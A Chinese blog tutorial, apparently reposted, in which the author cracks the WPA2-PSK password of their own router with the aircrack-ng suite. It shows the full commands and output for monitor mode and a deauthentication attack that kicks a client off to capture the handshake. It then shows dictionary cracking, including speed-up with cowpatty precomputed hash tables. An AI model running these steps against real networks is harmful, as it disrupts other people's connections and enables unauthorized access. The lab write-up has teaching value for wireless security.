博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
wpa破解学习实践
阅读量:4919 次
发布时间:2019-06-11

本文共 4134 字,大约阅读时间需要 13 分钟。

概述:

针对WEP的一些弱点,WPA(WiFi Protected Access)一一改进:

WPA又分两种基本类别:

• WPA Enterprise (requires a Radius server)

• WPA Personal (also known as WPA-PSK)

我们一般使用的是WPA Personal,也就是一个AP只有一个密钥(Pre-shared Key)。

WPA又有WPA和WPA2,前者只能使用TKIP(Temporary Key Integrity Protocol)加密,后者除TKIP外还能使用AES(Advanced Encryption Standard)进行加密。

 

实践:

环境: 虚拟机kali 2.0 + usb无线网卡(360随身wifi) + 无线路由(使用wpa2-psk加密)

利用系统自带的aircrack-ng套件进行实验。关于aircrack-ng的使用可参考 http://kalitut.blogspot.sg/2015/09/crack-wpa2-wifi-password.html

第一步:先将无线网卡开成监听模式。(期间要求关闭3个进程)

root@kali:~# iwconfigwlan0     IEEE 802.11bgn  ESSID:off/any            Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm             Retry short limit:7   RTS thr:off   Fragment thr:off          Encryption key:off          Power Management:off          lo        no wireless extensions.eth0      no wireless extensions.root@kali:~# airmon-ng start wlan0Found 3 processes that could cause trouble.If airodump-ng, aireplay-ng or airtun-ng stops working aftera short period of time, you may want to run 'airmon-ng check kill'  PID Name  702 NetworkManager  847 wpa_supplicant 5674 dhclientPHY    Interface    Driver        Chipsetphy0    wlan0        mt7601u        Ralink Technology, Corp. MT7601U        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)        (mac80211 station mode vif disabled for [phy0]wlan0)root@kali:~# kill 702 847 5674root@kali:~# airmon-ng start wlan0PHY    Interface    Driver        Chipsetphy0    wlan0mon    mt7601u        Ralink Technology, Corp. MT7601U

 

第二步:开始监听。

root@kali:~# airodump wlan0mon

以下为监听结果(为了保护信息,做了些模糊处理):

其中BSSID为AP(Access Point)的硬件地址,CH为所在的信道(一般是1、6、11),ESSID就是AP的名字。下方的STATION是连入该ap的一些客户。

此时右上角是空白的,说明并没有捕获到wpa握手包。(也就是监听期间并没有新用户进行验证连接该ap)

选定一个AP进行监听。我们选择下面监听到多个客户连入的这个AP(以6C:E8开头的MAC):

root@kali:~# airodump -w test --channel 11 --bssid 6C:E8:XX:XX:XX:XX wlan0mon

其中-w test表示将抓到的包存到新建的test文件中。

 

第三步:为了尽快捕获握手包,进行Deauthenticate验证攻击

root@kali:~# aireplay-ng -0 10 -a 6C:E8:73:F9:54:D2 -c 70:18:8B:38:85:B1 wlan0mon 10:19:03  Waiting for beacon frame (BSSID: 6C:E8:73:F9:54:D2) on channel 1110:19:04  Sending 64 directed DeAuth. STMAC: [70:18:XX:XX:XX:XX] [13|65 ACKs]10:19:05  Sending 64 directed DeAuth. STMAC: [70:18:XX:XX:XX:XX] [21|64 ACKs]10:19:05  Sending 64 directed DeAuth. STMAC: [70:18:XX:XX:XX:XX] [29|65 ACKs]10:19:06  Sending 64 directed DeAuth. STMAC: [70:18:XX:XX:XX:XX] [57|62 ACKs]10:19:07  Sending 64 directed DeAuth. STMAC: [70:18:XX:XX:XX;XX] [62|64 ACKs]10:19:07  Sending 64 directed DeAuth. STMAC: [70:18:XX:XX:XX;XX] [62|64 ACKs]10:19:08  Sending 64 directed DeAuth. STMAC: [70:18:XX:XX:XX:XX] [64|64 ACKs]10:19:09  Sending 64 directed DeAuth. STMAC: [70:18:XX:XX:XX:XX] [62|65 ACKs]10:19:09  Sending 64 directed DeAuth. STMAC: [70:18:XX:XX:XX:XX] [58|64 ACKs]10:19:10  Sending 64 directed DeAuth. STMAC: [70:18:XX:XX:XX:XX] [59|65 ACKs]

其中的参数-0是Deauthenticate攻击,10是发送数据包的数量,-a是要攻击的AP硬件地址,-c是连入该AP的客户端的硬件地址(非必须,但有的话攻击成功率高)。

成功捕获握手包!

 

第四步:用ctrl+c中断监听,可见当前目录下多了以test-01开头的四个文件。我们要用的是test-01.cap,对它进行暴力破解。

当然你得有字典文件,我这里使用了kali自带的字典,具体可参考前面给出的网址。

这里为了实验我作弊了,因为我的ap密码设置的比较复杂,暴力破解的难度比较高。所以我直接把密码添加到字典的第30000行上~

root@kali:~# aircrack-ng -w kalitut.txt test-01.cap

在我的虚拟机里能以800keys/s的速度破解,很快就找到了(图中模糊处),用时36秒

 

如何提升破解速度:

Time-Memory Trade-Offs是指将字典中的明文密码提前转换成hash值,建立高速wpa hash tables,用这个tables去对抓到的握手包进行暴力破解。

顾名思义,这么做会消耗更多存储空间,以换取破解时间的减少。

我们可以使用genpmk来建立高速wpa hash tables,这个genpmk是另一个无线破解工具cowpatty提供的。

这里如果要对我之前用的整个字典文件全部转换的话,这个过程要很久。所以我先提取前面的40000行出来建立tables就好了。

root@kali:~# genpmk -f kalitut2.txt -d testtables -s XXXgenpmk 1.1 - WPA-PSK precomputation attack. 
File testtables does not exist, creating.key no. 1000: ภ-จุๅภถถ/ึkey no. 2000: 000000sakey no. 3000: 00008114-- snip --key no. 39000: 0111398899key no. 40000: 0112911240000 passphrases tested in 132.22 seconds: 302.53 passphrases/second

其中参数-f是原来的明文字典,-d是生成的tables名,-s是AP的名称。

 

用生成的tables再次进行破解:

root@kali:~# cowpatty -d testtables -r test-01.cap -s XXX

其中参数-d是之前生成的tables,-r是抓到的包,-s是AP名。

速度达到134600.37keys/s,只用了0.22秒就找到了!比刚刚的36秒快多了!

 

总结:目前来看,wpa2的安全性还是相对较高的,针对它的破解一般基于暴力破解。所以我们只要设置好强度高的密码,一般就没什么问题了。

 

转载于:https://www.cnblogs.com/justforfun12/p/5397879.html

你可能感兴趣的文章
MongoDB3.X参数文件
查看>>
C语言中文件的读取和写入
查看>>
钽电容和电解电容的区别
查看>>
厌倦了ListBox打印消息,使用RichTextBox试试吧
查看>>
今天的状况
查看>>
django 笔记7 多对多
查看>>
[数据库基础]——图解JOIN
查看>>
1.4.2 Mother's Milk(dfs)
查看>>
Android中关于JNI 的学习(一)对于JNIEnv的一些认识
查看>>
BMP、GIF、JPEG、PNG以及其它图片格式简单介绍
查看>>
C语言学习之控制语句
查看>>
AtCoder - 2061 Tree Restoring
查看>>
C#位运算讲解与示例
查看>>
Delphi XE5教程11:Tokens
查看>>
python学习笔记-day9-1【发送邮件模块 yagmail】
查看>>
git错误:fatal: Not a git repository (or any of the parent directories): .git
查看>>
centos7安装openresty
查看>>
C艹 预备知识
查看>>
存储过程与函数的区别
查看>>
关于MYSQL group by 分组按时间取最大值的实现方法!
查看>>